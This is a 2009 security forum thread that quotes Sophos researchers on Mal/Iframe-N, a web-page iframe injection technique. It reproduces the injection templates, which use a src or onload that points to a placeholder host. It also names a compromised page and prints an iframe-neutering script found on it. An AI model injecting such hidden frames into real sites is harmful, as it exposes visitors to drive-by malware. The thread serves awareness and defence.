Author Topic: Mal/Iframe-N: The next big threat?  (Read 2802 times)

0 Members and 1 Guest are viewing this topic.

October 26, 2009, 10:25:41 am
Read 2802 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
http://www.sophos.com/blogs/sophoslabs/v/post/7056


Quote
What is so special about Mal/Iframe-N?

Normally, malicious Iframeís have the following form:
<iframe src=http://DOMAIN.TLD width=N height=N> where N is a small number.

Whereas, in the new attack there isnít a direct src= they use onload= like this:

<frame onload="if (!this.src){ this.src='http://DOMAIN.TLD'; this.height=N; this.width=N;}"> again N is a small number.

All the domains used so far have been based in Russia.

The tools being used to inject these Iframes is currently appending them to the end of legitimate HTML.


Example:
Code: [Select]
filmkolik.net/signaturepics/infraction.php
Code: [Select]
// 404 <script>function q84(){var a=document.getElementsByTagName('ifr'+'ame'),s='about:blank',b;for(var i=0;i<a.length;i++)if((b=a[i]).src!=s){b.src=s;b.style.display='none';b.onload=function(){this.location=s}}if(!(--JAaa))window.clearInterval(cweq)}JAaa=60000;q84();cweq=window.setInterval('q84()',1);
// iframes are EVIL! Hate Zeus!
//</script>
Ruining the bad guy's day

October 26, 2009, 02:32:17 pm
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
http://www.sophos.com/blogs/sophoslabs/?p=7123

Quote
This morning the security researcher behind the Malware Domain List emailed me after reading Mal/Iframe-N: The next big threat? and pointed me at an interesting compromised website he had noticed.



Quote
This JavaScript is non-malicious and will neuter Iframes on a page similar to the Defensive Iframing. It appears that a malware writing team is targeting iframes and Zeus (aka ZBot). Is this the same team as those behind Bredo? Or is there a new Web-based grouping?
Ruining the bad guy's day

October 28, 2009, 08:54:48 am
Reply #2

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190

October 28, 2009, 06:14:28 pm
Reply #3

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

October 29, 2009, 05:12:16 pm
Reply #4

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day